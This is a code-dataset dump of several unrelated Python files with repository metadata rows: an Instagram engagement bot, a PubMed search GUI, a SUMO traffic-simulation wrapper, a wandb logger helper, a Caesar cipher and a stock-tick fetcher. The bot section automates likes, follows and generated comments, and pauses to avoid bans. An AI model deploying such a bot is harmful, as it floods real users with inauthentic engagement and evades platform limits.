        except requests.exceptions.RequestException:
            self.write_log("Except on unlike!")
            unlike = 0
    return unlike
def comment(self, media_id, comment_text):
    """ Send http request to comment """
    # Posts *comment_text* on media *media_id*.  Returns the Response on
    # an attempted post, False on error or when not logged in.
    if self.login_status:
        comment_post = {'comment_text': comment_text}
        url_comment = self.url_comment % (media_id)
        try:
            comment = self.s.post(url_comment, data=comment_post)
            if comment.status_code == 200:
                self.comments_counter += 1
                log_string = 'Write: "%s". #%i.' % (comment_text,
                                                    self.comments_counter)
                self.write_log(log_string)
            return comment
        except:
            self.write_log("Except on comment!")
    return False
def follow(self, user_id):
    """ Send http request to follow """
    # Returns the Response on an attempted follow, False on error or when
    # not logged in; bumps self.follow_counter on HTTP 200.
    if self.login_status:
        url_follow = self.url_follow % (user_id)
        try:
            follow = self.s.post(url_follow)
            if follow.status_code == 200:
                self.follow_counter += 1
                log_string = "Followed: %s #%i." % (user_id,
                                                    self.follow_counter)
                self.write_log(log_string)
            return follow
        except:
            self.write_log("Except on follow!")
    return False

def unfollow(self, user_id):
    """ Send http request to unfollow """
    # Mirror of follow(): bumps self.unfollow_counter on HTTP 200.
    if self.login_status:
        url_unfollow = self.url_unfollow % (user_id)
        try:
            unfollow = self.s.post(url_unfollow)
            if unfollow.status_code == 200:
                self.unfollow_counter += 1
                log_string = "Unfollow: %s #%i." % (user_id,
                                                    self.unfollow_counter)
                self.write_log(log_string)
            return unfollow
        except:
            # (Original misspelling in the log message kept verbatim.)
            self.write_log("Exept on unfollow!")
    return False
def unfollow_on_cleanup(self, user_id):
    """ Unfollow on cleanup by @rjmayott """
    # Like unfollow(), but on a non-200 response backs off 5 minutes and
    # retries once; gives up (returns False) after a second failure.
    if self.login_status:
        url_unfollow = self.url_unfollow % (user_id)
        try:
            unfollow = self.s.post(url_unfollow)
            if unfollow.status_code == 200:
                self.unfollow_counter += 1
                log_string = "Unfollow: %s #%i of %i." % (
                    user_id, self.unfollow_counter, self.follow_counter)
                self.write_log(log_string)
            else:
                log_string = "Slow Down - Pausing for 5 minutes so we don't get banned!"
                self.write_log(log_string)
                time.sleep(300)
                unfollow = self.s.post(url_unfollow)
                if unfollow.status_code == 200:
                    self.unfollow_counter += 1
                    log_string = "Unfollow: %s #%i of %i." % (
                        user_id, self.unfollow_counter,
                        self.follow_counter)
                    self.write_log(log_string)
                else:
                    log_string = "Still no good :( Skipping and pausing for another 5 minutes"
                    self.write_log(log_string)
                    time.sleep(300)
                    return False
            return unfollow
        except:
            log_string = "Except on unfollow... Looks like a network error"
            self.write_log(log_string)
            return False
def auto_mod(self):
    """ Star loop, that get media ID by your tag list, and like it """
    # Legacy endless loop: pick a random tag, fetch its media and like
    # 1..max_like_for_one_tag of them.  Never returns while logged in.
    if self.login_status:
        while True:
            # NOTE(review): shuffling mutates self.tag_list in place.
            random.shuffle(self.tag_list)
            self.get_media_id_by_tag(random.choice(self.tag_list))
            self.like_all_exist_media(random.randint(1, self.max_like_for_one_tag))
def new_auto_mod(self):
    """Main scheduler loop: refresh media by tag, then run each task when due."""
    while True:
        # ------------------- Get media_id -------------------
        if len(self.media_by_tag) == 0:
            self.get_media_id_by_tag(random.choice(self.tag_list))
            self.this_tag_like_count = 0
            self.max_tag_like_count = random.randint(
                1, self.max_like_for_one_tag)
        # ------------------- Like -------------------
        self.new_auto_mod_like()
        # ------------------- Follow -------------------
        self.new_auto_mod_follow()
        # ------------------- Unfollow -------------------
        self.new_auto_mod_unfollow()
        # ------------------- Comment -------------------
        self.new_auto_mod_comments()
        # Pause between scheduler iterations.
        time.sleep(3)
        # print("Tic!")
def new_auto_mod_like(self):
    """Like one pending media item when the Like task is due."""
    if time.time() > self.next_iteration["Like"] and self.like_per_day != 0 \
            and len(self.media_by_tag) > 0:
        # You have media_id to like:
        if self.like_all_exist_media(media_size=1, delay=False):
            # If like go to sleep:
            self.next_iteration["Like"] = time.time() + \
                self.add_time(self.like_delay)
            # Count this tag likes:
            self.this_tag_like_count += 1
            # Once the per-tag budget is spent, leave one sentinel entry
            # so the deletion below empties the list and forces a refetch.
            if self.this_tag_like_count >= self.max_tag_like_count:
                self.media_by_tag = [0]
        # Del first media_id
        del self.media_by_tag[0]
def new_auto_mod_follow(self):
    """Follow the owner of the next pending media when the task is due."""
    if time.time() > self.next_iteration["Follow"] and \
            self.follow_per_day != 0 and len(self.media_by_tag) > 0:
        if self.media_by_tag[0]["owner"]["id"] == self.user_id:
            self.write_log("Keep calm - It's your own profile ;)")
            return
        log_string = "Trying to follow: %s" % (
            self.media_by_tag[0]["owner"]["id"])
        self.write_log(log_string)
        if self.follow(self.media_by_tag[0]["owner"]["id"]) != False:
            # Remember who we followed (and when) for later unfollowing.
            self.bot_follow_list.append(
                [self.media_by_tag[0]["owner"]["id"], time.time()])
            self.next_iteration["Follow"] = time.time() + \
                self.add_time(self.follow_delay)
def new_auto_mod_unfollow(self):
    """Unfollow one bot-followed account whose follow_time has expired."""
    if time.time() > self.next_iteration["Unfollow"] and \
            self.unfollow_per_day != 0 and len(self.bot_follow_list) > 0:
        if self.bot_mode == 0:
            # NOTE(review): the list is mutated while iterating; entries
            # after a removal can be skipped until the next call.
            for f in self.bot_follow_list:
                if time.time() > (f[1] + self.follow_time):
                    log_string = "Trying to unfollow #%i: " % (
                        self.unfollow_counter + 1)
                    self.write_log(log_string)
                    self.auto_unfollow()
                    self.bot_follow_list.remove(f)
                    self.next_iteration["Unfollow"] = time.time() + \
                        self.add_time(self.unfollow_delay)
        if self.bot_mode == 1:
            # NOTE(review): unfollow_protocol is not defined in this file
            # -- presumably imported elsewhere; confirm.
            unfollow_protocol(self)
def new_auto_mod_comments(self):
    """Comment on the next pending media when due and not already commented."""
    if time.time() > self.next_iteration["Comments"] and self.comments_per_day != 0 \
            and len(self.media_by_tag) > 0 \
            and self.check_exisiting_comment(self.media_by_tag[0]['code']) == False:
        comment_text = self.generate_comment()
        log_string = "Trying to comment: %s" % (self.media_by_tag[0]['id'])
        self.write_log(log_string)
        if self.comment(self.media_by_tag[0]['id'], comment_text) != False:
            self.next_iteration["Comments"] = time.time() + \
                self.add_time(self.comments_delay)
def add_time(self, time):
    """Jitter a delay: uniform in [0.9 * time, 1.1 * time)."""
    base = time * 0.9
    noise = time * 0.2 * random.random()
    return base + noise
def generate_comment(self):
    """Assemble a random compliment from the comment-word matrix."""
    combos = list(itertools.product(*self.comment_list))
    sentence = " ".join(random.choice(combos))
    # Tidy spacing artefacts produced by the join above.
    for pattern, replacement in [("  ", " "), (" .", "."), (" !", "!")]:
        sentence = sentence.replace(pattern, replacement)
    return sentence.capitalize()
def check_exisiting_comment(self, media_code):
    """Return True when we must not comment on *media_code*.

    True when the media is our own or we already commented on it (in both
    cases the item is dropped from self.media_by_tag so the scheduler
    moves on).  (Name typo kept: callers use check_exisiting_comment.)
    """
    url_check = self.url_media_detail % (media_code)
    check_comment = self.s.get(url_check)
    all_data = json.loads(check_comment.text)
    if all_data['graphql']['shortcode_media']['owner']['id'] == self.user_id:
        self.write_log("Keep calm - It's your own media ;)")
        # Del media to don't loop on it
        del self.media_by_tag[0]
        return True
    comment_list = list(all_data['graphql']['shortcode_media']['edge_media_to_comment']['edges'])
    for d in comment_list:
        if d['node']['owner']['id'] == self.user_id:
            self.write_log("Keep calm - Media already commented ;)")
            # Del media to don't loop on it
            del self.media_by_tag[0]
            return True
    return False
def auto_unfollow(self):
    """Pick a random account from the recent feed, classify it, and
    unfollow it unless it looks like a normal, active follower.

    Classification heuristics (follower/following ratios, media counts)
    set the is_selebgram / is_fake_account / is_active_user /
    is_follower / is_following flags on self.  (Indentation reconstructed
    from a whitespace-mangled source.)
    """
    chooser = 1
    current_user = 'abcd'
    current_id = '12345'
    checking = True
    self.media_on_feed = []
    if len(self.media_on_feed) < 1:
        self.get_media_id_recent_feed()
    if len(self.media_on_feed) != 0:
        # Pick a random feed item; re-pick while the owner is whitelisted.
        chooser = random.randint(0, len(self.media_on_feed) - 1)
        current_id = self.media_on_feed[chooser]['node']["owner"]["id"]
        current_user = self.media_on_feed[chooser]['node']["owner"][
            "username"]
        while checking:
            for wluser in self.unfollow_whitelist:
                if wluser == current_user:
                    chooser = random.randint(0,
                                             len(self.media_on_feed) - 1)
                    current_id = self.media_on_feed[chooser]['node'][
                        "owner"]["id"]
                    current_user = self.media_on_feed[chooser]['node'][
                        "owner"]["username"]
                    log_string = (
                        "found whitelist user, starting search again")
                    self.write_log(log_string)
                    break
            else:
                # No whitelist hit: accept this candidate.
                checking = False
    if self.login_status:
        now_time = datetime.datetime.now()
        log_string = "%s : Get user info \n%s" % (
            self.user_login, now_time.strftime("%d.%m.%Y %H:%M"))
        self.write_log(log_string)
        if self.login_status == 1:
            url_tag = self.url_user_detail % (current_user)
            try:
                r = self.s.get(url_tag)
                all_data = json.loads(r.text)
                self.user_info = all_data['user']
                i = 0
                log_string = "Checking user info.."
                self.write_log(log_string)
                # Single-pass classification (while kept from original).
                while i < 1:
                    follows = self.user_info['follows']['count']
                    follower = self.user_info['followed_by']['count']
                    media = self.user_info['media']['count']
                    follow_viewer = self.user_info['follows_viewer']
                    followed_by_viewer = self.user_info[
                        'followed_by_viewer']
                    requested_by_viewer = self.user_info[
                        'requested_by_viewer']
                    has_requested_viewer = self.user_info[
                        'has_requested_viewer']
                    log_string = "Follower : %i" % (follower)
                    self.write_log(log_string)
                    log_string = "Following : %s" % (follows)
                    self.write_log(log_string)
                    log_string = "Media : %i" % (media)
                    self.write_log(log_string)
                    # NOTE(review): these ratios divide by follows/follower/
                    # media and will raise ZeroDivisionError for accounts
                    # with zero counts (caught by the broad except below).
                    if follower / follows > 2:
                        self.is_selebgram = True
                        self.is_fake_account = False
                        print(' >>>This is probably Selebgram account')
                    elif follows / follower > 2:
                        self.is_fake_account = True
                        self.is_selebgram = False
                        print(' >>>This is probably Fake account')
                    else:
                        self.is_selebgram = False
                        self.is_fake_account = False
                        print(' >>>This is a normal account')
                    if follows / media < 10 and follower / media < 10:
                        self.is_active_user = True
                        print(' >>>This user is active')
                    else:
                        self.is_active_user = False
                        print(' >>>This user is passive')
                    if follow_viewer or has_requested_viewer:
                        self.is_follower = True
                        print(" >>>This account is following you")
                    else:
                        self.is_follower = False
                        print(' >>>This account is NOT following you')
                    if followed_by_viewer or requested_by_viewer:
                        self.is_following = True
                        print(' >>>You are following this account')
                    else:
                        self.is_following = False
                        print(' >>>You are NOT following this account')
                    i += 1
            except:
                # NOTE(review): assigns a *local* media_on_feed, not
                # self.media_on_feed -- likely a latent bug; confirm.
                media_on_feed = []
                self.write_log("Except on get_info!")
                time.sleep(20)
                return 0
        else:
            return 0
    # Unfollow anything that is not a normal, active account following us.
    if self.is_selebgram is not False or self.is_fake_account is not False or self.is_active_user is not True or self.is_follower is not True:
        print(current_user)
        self.unfollow(current_id)
    try:
        del self.media_on_feed[chooser]
    except:
        self.media_on_feed = []
    self.media_on_feed = []
def get_media_id_recent_feed(self):
    """Fill self.media_on_feed with the logged-in user's timeline edges."""
    if self.login_status:
        # NOTE(review): now_time is computed but unused here.
        now_time = datetime.datetime.now()
        log_string = "%s : Get media id on recent feed" % (self.user_login)
        self.write_log(log_string)
        if self.login_status == 1:
            url_tag = 'https://www.instagram.com/?__a=1'
            try:
                r = self.s.get(url_tag)
                all_data = json.loads(r.text)
                self.media_on_feed = list(
                    all_data['graphql']['user']['edge_web_feed_timeline'][
                        'edges'])
                log_string = "Media in recent feed = %i" % (
                    len(self.media_on_feed))
                self.write_log(log_string)
            except:
                # Network error or unexpected JSON layout: back off briefly.
                self.media_on_feed = []
                self.write_log("Except on get_media!")
                time.sleep(20)
                return 0
        else:
            return 0
def write_log(self, log_text):
    """ Write log by print() or logger """
    # log_mod 0: console.  log_mod 1: lazily-created per-user log file.
    # Any other value silences logging entirely.
    if self.log_mod == 0:
        try:
            print(log_text)
        except UnicodeEncodeError:
            # Terminal encoding cannot represent the text.
            print("Your text has unicode problem!")
    elif self.log_mod == 1:
        # Create log_file if not exist.
        if self.log_file == 0:
            self.log_file = 1
            now_time = datetime.datetime.now()
            self.log_full_path = '%s%s_%s.log' % (
                self.log_file_path, self.user_login,
                now_time.strftime("%d.%m.%Y_%H:%M"))
            formatter = logging.Formatter('%(asctime)s - %(name)s '
                                          '- %(message)s')
            self.logger = logging.getLogger(self.user_login)
            self.hdrl = logging.FileHandler(self.log_full_path, mode='w')
            self.hdrl.setFormatter(formatter)
            self.logger.setLevel(level=logging.INFO)
            self.logger.addHandler(self.hdrl)
        # Log to log file.
        try:
            self.logger.info(log_text)
        except UnicodeEncodeError:
            print("Your text has unicode problem!")
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
c6c4d8e35d0129f75e49d92bfe882b3936490218 | 56892b9b1cf1f7d674a79d6e2fe0a0a0062441e6 | /lipidnetui.py | 42cf124484e7e69e361bf30db2b69994ce0a9437 | [] | no_license | mannerhybrid/lipidnet | d6ddaf68e898bb67ea94aa08f3af6a9557692c22 | 7421edc5bf9bcceb5196d353fa100241fc744dee | refs/heads/master | 2020-03-19T07:15:41.158632 | 2018-08-28T02:24:28 | 2018-08-28T02:24:28 | 136,099,824 | 0 | 0 | null | 2018-06-05T01:12:20 | 2018-06-05T00:58:28 | null | UTF-8 | Python | false | false | 5,795 | py | # -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import tkinter as tk
import time
from tkinter import ttk
from Bio import Entrez
from bs4 import BeautifulSoup as soup
Entrez.email = "md.nur.hakim.rosli@gmail.com"
class LipidUI(tk.Tk):
    """Root window that stacks the app's pages and raises one at a time."""

    def __init__(self, *args, **kwargs):
        tk.Tk.__init__(self, *args, **kwargs)
        container = tk.Frame(self)
        container.pack(side="top", fill="both", expand=True)
        container.grid_rowconfigure(0, weight=1)
        container.grid_columnconfigure(0, weight=1)
        # Map page-class name -> instantiated frame.  Uses __name__ instead
        # of the old, fragile str(cls).replace("<class '__main__.", ...)
        # parsing (which also broke debug printing into the console).
        self.frames = {}
        for page_cls in (HomePage, SearchPage, FetchPage):
            frame = page_cls(container, self)
            self.frames[page_cls.__name__] = frame
            frame.grid(row=0, column=0, sticky="nsew")
        self.show_frame('HomePage')

    def show_frame(self, cont):
        """Raise a page; *cont* may be the page class or its name."""
        name = cont if isinstance(cont, str) else cont.__name__
        self.frames[name].tkraise()
class HomePage(tk.Frame):
    """Landing page with navigation buttons to the search and fetch pages."""

    def __init__(self, parent, controller):
        tk.Frame.__init__(self, parent)
        banner = tk.Label(self, text="WELCOME TO LIPIDNET", font='LARGE_FONT')
        banner.pack(padx=10, pady=10)
        nav_spec = [("SEARCH", 'SearchPage', 'left'),
                    ("FETCH", 'FetchPage', 'right')]
        for caption, target, anchor in nav_spec:
            btn = tk.Button(self, text=caption, bg='gold', fg='yellow',
                            command=lambda page=target: controller.show_frame(page))
            btn.pack(padx=10, pady=10, side=anchor)
class SearchPage(tk.Frame):
    """Page that runs a PubMed esearch for a user-supplied term."""

    def __init__(self, parent, controller):
        tk.Frame.__init__(self, parent)
        title = tk.Label(self, text="LIPIDNET SEARCH PAGE", font='LARGE_FONT')
        title.pack(padx=10, pady=10)
        label = tk.Label(self, text="Please enter search term below:", font='LARGE_FONT')
        label.pack(padx=10, pady=10)
        # Keep the entry widget; its text is read when the button is
        # clicked.  The old code created two Entry widgets and captured
        # entry.get() at construction time, when the field was still empty,
        # so every search ran with an empty term.
        self.entry = tk.Entry(self)
        self.entry.pack(padx=10, pady=10)
        searchbutton = tk.Button(self, text="Obtain records", command=self.start)
        searchbutton.pack(side="top", padx=10, pady=10)
        # Single progress bar (previously constructed twice; the first
        # instance was never packed and simply leaked).
        self.progress = ttk.Progressbar(self, orient="horizontal",
                                        length=200, mode="determinate")
        self.progress.pack(side="top")
        button1 = tk.Button(self, text="HOME", bg='gold', fg='yellow',
                            command=lambda: controller.show_frame('HomePage'))
        button1.pack(padx=10, pady=10, side='left')
        button2 = tk.Button(self, text="FETCH", bg='gold', fg='yellow',
                            command=lambda: controller.show_frame('FetchPage'))
        button2.pack(padx=10, pady=10, side='right')

    def start(self):
        """Run the PubMed search and display the count and elapsed time."""
        self.progress["value"] = 0
        self.progress["maximum"] = 100
        # Use a distinct attribute name: the old `self.start = time.time()`
        # shadowed this method on the instance.
        self.start_time = time.time()
        label = tk.Label(self, text="Beginning Search", font='LARGE_FONT')
        label.pack(padx=10, pady=10)
        term = self.entry.get()
        raw = Entrez.esearch(db="pubmed", term=term, retmode="xml").read()
        print(raw)
        # esearch returns an XML *string*; parse it first.  The old code
        # called .find_all / .RetMax on the raw string -> AttributeError.
        # NOTE(review): html.parser lowercases tag names, hence "id".
        parsed = soup(raw, "html.parser")
        idlist = [node.text for node in parsed.find_all("id")]
        self.update()
        self.timetaken = self.end - self.start_time
        timeresult = "Search completed in {} seconds".format(self.timetaken)
        retmax = parsed.find("retmax")
        total = parsed.find("count")
        full_count = "{} records obtained from a total of {}.".format(
            retmax.text if retmax else len(idlist),
            total.text if total else "unknown")
        count = tk.Label(self, text=full_count)
        result = tk.Label(self, text=timeresult)
        count.pack(padx=10, pady=10)
        result.pack(padx=10, pady=10)

    def update(self):
        """Fill the progress bar and record the finish time.

        NOTE(review): this intentionally overrides tkinter's Misc.update.
        """
        self.progress["value"] = 100
        self.end = time.time()
class FetchPage(tk.Frame):
    """Page intended to fetch records for a user-supplied search term."""

    def __init__(self, parent, controller):
        tk.Frame.__init__(self, parent, bg='yellow')
        label = tk.Label(self, text="LIPIDNET FETCH PAGE", font='LARGE_FONT', bg='yellow', fg='gold')
        label.pack(padx=20, pady=20)
        # Entry for the search term: the old start() read self.term, which
        # was never assigned anywhere in this class (AttributeError).
        self.entry = tk.Entry(self)
        self.entry.pack(padx=10, pady=10)
        self.progress = ttk.Progressbar(self, orient="horizontal",
                                        length=200, mode="determinate")
        button1 = tk.Button(self, text="HOME", bg='gold', fg='yellow',
                            command=lambda: controller.show_frame(HomePage))
        button1.pack(padx=10, pady=10, side='left')
        button2 = tk.Button(self, text="SEARCH", bg='gold', fg='yellow',
                            command=lambda: controller.show_frame(SearchPage))
        button2.pack(padx=10, pady=10, side='right')
        self.progress.pack()

    def start(self):
        """Run an Entrez search for the entered term; show elapsed time."""
        self.progress["value"] = 0
        self.progress["maximum"] = 100
        # Local variable: the old `self.start = time.time()` shadowed this
        # method on the instance.
        start_time = time.time()
        idlist = Entrez.read(Entrez.esearch(db="pubmed", term=self.entry.get()))
        # Quoted font name: the bare LARGE_FONT was an undefined variable
        # that raised NameError the first time the button was pressed.
        label = tk.Label(self, text="Beginning Search", font='LARGE_FONT')
        label.pack(padx=10, pady=10)
        self.update()
        self.timetaken = self.end - start_time
        timeresult = "Search completed in {} seconds".format(self.timetaken)
        result = tk.Label(self, text=timeresult)
        result.pack(padx=10, pady=10)

    def update(self):
        """Fill the progress bar and record the finish time."""
        self.progress["value"] = 100
        self.end = time.time()
if __name__ == "__main__":
    # Launch the GUI only when run as a script, not on import.
    app = LipidUI()
    app.mainloop()
"noreply@github.com"
] | noreply@github.com |
02e4329074b8d1394dd9e02cf79281aea4bc695a | a34be2a91093ca9e9f79c8b54d5d82be0ce99f41 | /environments/sumo_gym.py | 4d45cdc1618f7c3ef8e7ff0b13f7926468d6c397 | [] | no_license | ndeshp2s/sumo-gym | 7967e84fd5b752de66403e3a68f012ae55718026 | 0bfa8753f692dbaa3f494a7d88cc18d8572d3f11 | refs/heads/master | 2021-06-20T10:19:33.348471 | 2021-01-21T10:21:05 | 2021-01-21T10:21:05 | 172,554,330 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,446 | py | import os
import sys
import gym
# Make SUMO's bundled python tools (traci, sumolib) importable, or abort
# with an actionable message when SUMO_HOME is not configured.
if 'SUMO_HOME' in os.environ:
    tools = os.path.join(os.environ['SUMO_HOME'], 'tools')
    sys.path.append(tools)
else:
    sys.exit("please declare environment variable 'SUMO_HOME'")
import traci
from sumolib import checkBinary
class SumoGym(gym.Env):
    """Minimal gym.Env wrapper that manages a SUMO simulation via TraCI."""

    def __init__(self):
        # True while a TraCI connection to SUMO is open.
        self.sumo_running = False
        self.sumo_config = None

    def start_sumo(self):
        """Start SUMO via TraCI if it is not already running."""
        # NOTE(review): self.sumo_cmd is never assigned in this class --
        # presumably supplied by a subclass; confirm before use.
        if not self.sumo_running:
            traci.start(self.sumo_cmd)
            self.sumo_running = True

    def stop_sumo(self):
        """Close the TraCI connection and flush anything SUMO printed."""
        if self.sumo_running:
            traci.close()
            sys.stdout.flush()
            self.sumo_running = False

    def add_ego_vehicle(self, pose = 0.0):
        """Remove any existing ego vehicle and insert a fresh one at *pose*."""
        # NOTE(review): dt is computed but unused.
        dt = traci.simulation.getDeltaT()
        vehicles = traci.vehicle.getIDList()
        # NOTE(review): the removal check uses self.ev.id while the
        # insertion below uses self.config.ev_id -- neither attribute is
        # set in this class; verify they refer to the same vehicle id.
        for i in range(len(vehicles)):
            if vehicles[i] == self.ev.id:
                try:
                    traci.vehicle.remove(self.ev.id)
                except:
                    pass
        traci.vehicle.addFull(self.config.ev_id, 'routeEgo', depart=None, departPos=str(pose), departSpeed='0', typeID='vType0')
        # Speed mode 0: presumably disables SUMO's safety checks so speed
        # can be driven externally -- confirm against the TraCI docs.
        traci.vehicle.setSpeedMode(self.config.ev_id, int('00000',0))
        traci.vehicle.setSpeed(self.config.ev_id, 0.0)
        traci.vehicle.subscribe(self.config.ev_id, [traci.constants.VAR_SPEED])

    def get_ev_speed(self):
        """Return the latest TraCI subscription results for the ego vehicle."""
        return traci.vehicle.getSubscriptionResults(self.config.ev_id)
"niranjan.deshpande187@gmail.com"
] | niranjan.deshpande187@gmail.com |
116006e27e9db0ac8a63a39f89b241ebcd2a358a | 3554ca28e1cf94fac1173cfee0498e974872561f | /examples/utils/loggers.py | 6829522c3bcd51222c334db31bbc7ebb0e7b21d9 | [] | no_license | tchaton/lightning-geometric | 4a5aeec847df317804f28772554b411923271019 | a8348aa327d240285a921cb2f927c8f94139ea3f | refs/heads/master | 2023-03-28T15:25:08.060346 | 2020-10-03T17:43:27 | 2020-10-03T17:43:27 | 294,764,248 | 44 | 6 | null | 2021-04-04T09:23:50 | 2020-09-11T17:34:52 | Python | UTF-8 | Python | false | false | 1,733 | py | from typing import Dict
import shutil
import os
import subprocess
import hydra
import inspect
from hydra.utils import instantiate
from pytorch_lightning.loggers import WandbLogger
def initialize_WandbLogger(*args, **kwargs):
    """Build a WandbLogger whose config captures the hydra run, git state
    and the model/dataset configs supplied via **kwargs.

    Requires 'model_config' and 'dataset_config' keys in kwargs; other
    recognised WandbLogger.__init__ parameters are forwarded as-is.
    """
    # Parameter names of WandbLogger.__init__, minus `self` and the final
    # catch-all, used to pick the recognised kwargs out of **kwargs.
    keys = [k for k in inspect.signature(WandbLogger.__init__).parameters.keys()][1:-1]
    wandb_dict = {k: kwargs.get(k) for k in keys}
    try:
        commit_sha = (
            subprocess.check_output(["git", "rev-parse", "HEAD"])
            .decode("ascii")
            .strip()
        )
    except:
        # Not a git checkout (or git unavailable) -- record a placeholder.
        commit_sha = "n/a"
    try:
        gitdiff = subprocess.check_output(["git", "diff"]).decode()
    except:
        gitdiff = ""
    wandb_dict["config"] = {}
    wandb_dict["config"].update(kwargs["model_config"])
    wandb_dict["config"].update(kwargs["dataset_config"])
    wandb_dict["config"].update(
        {
            "run_path": os.getcwd(),
            "commit": commit_sha,
            "notes": wandb_dict.get("notes"),
        }
    )
    wandbLogger = WandbLogger(**wandb_dict)
    # Hydra writes .hydra/config.yaml into the run dir; copy it under a
    # distinct name and upload it together with the CLI overrides.
    shutil.copyfile(
        os.path.join(os.getcwd(), ".hydra/config.yaml"),
        os.path.join(os.getcwd(), ".hydra/hydra-config.yaml"),
    )
    wandbLogger.experiment.save(os.path.join(os.getcwd(), ".hydra/hydra-config.yaml"))
    wandbLogger.experiment.save(os.path.join(os.getcwd(), ".hydra/overrides.yaml"))
    # Preserve uncommitted changes as a patch artefact for reproducibility.
    with open("change.patch", "w") as f:
        f.write(gitdiff)
    wandbLogger.experiment.save(os.path.join(os.getcwd(), "change.patch"))
    return wandbLogger
def initialize_loggers(cfg, *args, **kwargs):
    """Instantiate every configured logger; empty list when logging is off."""
    if not cfg.log:
        return []
    return [instantiate(logger_cfg, *args, **kwargs)
            for logger_cfg in cfg.loggers.loggers]
"thomas.chaton.ai@gmail.com"
] | thomas.chaton.ai@gmail.com |
fa568dcd357b037a884e720bb3f4b2961b3d5e46 | 343413e76c09d2bd3d009f382d9dcd19c984d58f | /.history/main_20201229180214.py | e7c1f84e7a234bab2a2ddd0a968647204387eebe | [] | no_license | rozbeh1212/cipher | 7b81e640501639cefb0fe6bf100647dd2602291e | abdebdd7d1e155ffab78ce38be8bf28074366c42 | refs/heads/master | 2023-02-04T13:44:36.892470 | 2020-12-29T14:44:10 | 2020-12-29T14:44:10 | 325,314,022 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 991 | py | alphabet = [
'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o',
'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'
'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o',
'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'
]
# Interactive configuration: direction ("encode"/"decode"), message, shift.
direction = input("Type 'encode' to encrypt, type 'decode' to decrypt:\n")
text = input("Type your message:\n").lower()
shift = int(input("Type the shift number:\n"))
def caeser(start_text, shift_amount, cipher_direction):
    """Caesar-cipher *start_text* by *shift_amount* letters.

    cipher_direction "decode" shifts backwards; anything else encodes.
    Non-alphabetic characters pass through unchanged.  Prints and returns
    the transformed text.

    Fixes over the previous draft: the parameter was misspelled
    `shipft_amount` while the call site passed `shift_amount=` (TypeError);
    `alphabet.index(position)` read the result name before assignment
    (NameError); the sign flip for decoding ran once *per letter*,
    alternating direction; and the final print referenced undefined names.
    """
    from string import ascii_lowercase as letters  # self-contained lookup
    if cipher_direction == "decode":
        shift_amount *= -1
    end_text = ""
    for letter in start_text:
        if letter in letters:
            position = letters.index(letter)
            # Modulo 26 wraps both past 'z' and below 'a'.
            new_position = (position + shift_amount) % 26
            end_text += letters[new_position]
        else:
            end_text += letter
    print(f"The {cipher_direction}d text is {end_text}")
    return end_text
# NOTE(review): `art` is imported mid-file and never used below; move it
# to the top-of-file import block (kept in place here to avoid changes).
import art
# Run the cipher with the interactively-collected settings.
caeser(start_text=text, shift_amount=shift, cipher_direction=direction)
| [
"eb.mehrdad@gmail.com"
] | eb.mehrdad@gmail.com |
9aa3ab83c5304e5dd042b22eef1c00f745172a1a | b032e30b00ee9a83b6a782b3390ee034f9b79aff | /bin/get_today_ticks.py | a3f1b91350721e7cc1117ef33275ffaa1d7c1781 | [] | no_license | gedong009/stock-selection | ace9cc721bc8790dfa40388a7af014e400976359 | eab69921e422a3e0d7f5cd32c15f4bb98c493a78 | refs/heads/master | 2021-04-27T04:42:28.235282 | 2019-06-01T02:51:28 | 2019-06-01T02:51:28 | 122,584,272 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,796 | py | #encoding: utf-8
import pymysql
import tushare as ts
import sql_model
import pandas as pd
import numpy as np
from debug import p
import threading
import code_redis
import datetime
import time
import debug
def dd(code, mysql_obj=None, threadName=None):
    """Poll today's tick data for one stock *code* via tushare and bulk-load
    each batch into the `stock_daily_big_order` table through *mysql_obj*.

    Returns 1 once the session is over (weekend, after the 15:10 close, or
    before the 9:30 open); otherwise polls once a minute.

    NOTE(review): mysql_obj defaults to None but is dereferenced on every
    load -- callers must always pass a connected sql_model.MysqlClass.
    """
    now = datetime.datetime.now()
    # Skip weekends entirely (5 = Saturday, 6 = Sunday).
    if now.weekday() == 5 or now.weekday() == 6:
        return 1
    today = now.strftime("%Y-%m-%d")
    while True:
        df = ts.get_today_ticks(code)
        if df is not None and len(df) > 1:
            # Prefix the bare HH:MM:SS tick time with today's date and map
            # tushare's column names onto the table's column names.
            df['time'] = today + " " + df['time']
            df.rename(columns={'code': 'sCode', 'time': 'tDateTime', 'price': 'iPrice', 'pchange': 'iPchange',
                               'change': 'iChange', 'volume': 'iVolume', 'amount': 'iAmount', 'type': 'sType'}, inplace=True)
            result = mysql_obj.loadData('stock_daily_big_order', df.keys(), df.values, threadName)
            print(result)
        # Re-read the clock on every pass; the original sampled it once
        # before the loop, so this exit test always compared a stale time
        # and the loop could spin forever.
        now = datetime.datetime.now()
        # Exit after the 15:10 close (the original `hour >= 15 and
        # minute >= 10` missed e.g. 16:05) or before the 9:30 open.
        after_close = now.hour > 15 or (now.hour == 15 and now.minute >= 10)
        before_open = now.hour < 9 or (now.hour == 9 and now.minute < 30)
        if after_close or before_open:
            return 1
        # Wait a minute before the next poll.
        print("%s wait 60s" % code)
        time.sleep(60)
# Worker loop: drain pending stock codes and fetch ticks for each.
def get_data(threadName, mysql_obj):
    """Thread target: repeatedly pop the next stock code from the
    "today_ticks" Redis work list and collect its ticks via dd();
    exits once get_next_code returns a falsy value (queue empty)."""
    while 1 == 1:
        # Pop the next pending code from the Redis-backed work list.
        code = code_redis.get_next_code("today_ticks")
        # code = "601313"
        if code:
            print("%s: %s begin" % (threadName, code))
            dd(code, mysql_obj, threadName)
            print("%s: %s end" % (threadName, code))
        else:
            break
if __name__ == '__main__':
    # Load all stock codes into the pending work list (disabled here).
    # num = code_redis.reset_codelist_redis("today_ticks")
    # Build the worker thread pool.
    threads = []
    n = 1
    # n = num
    counter = 1
    mysql_obj = sql_model.MysqlClass()
    # One shared MysqlClass instance is handed to every worker thread.
    while counter <= n:
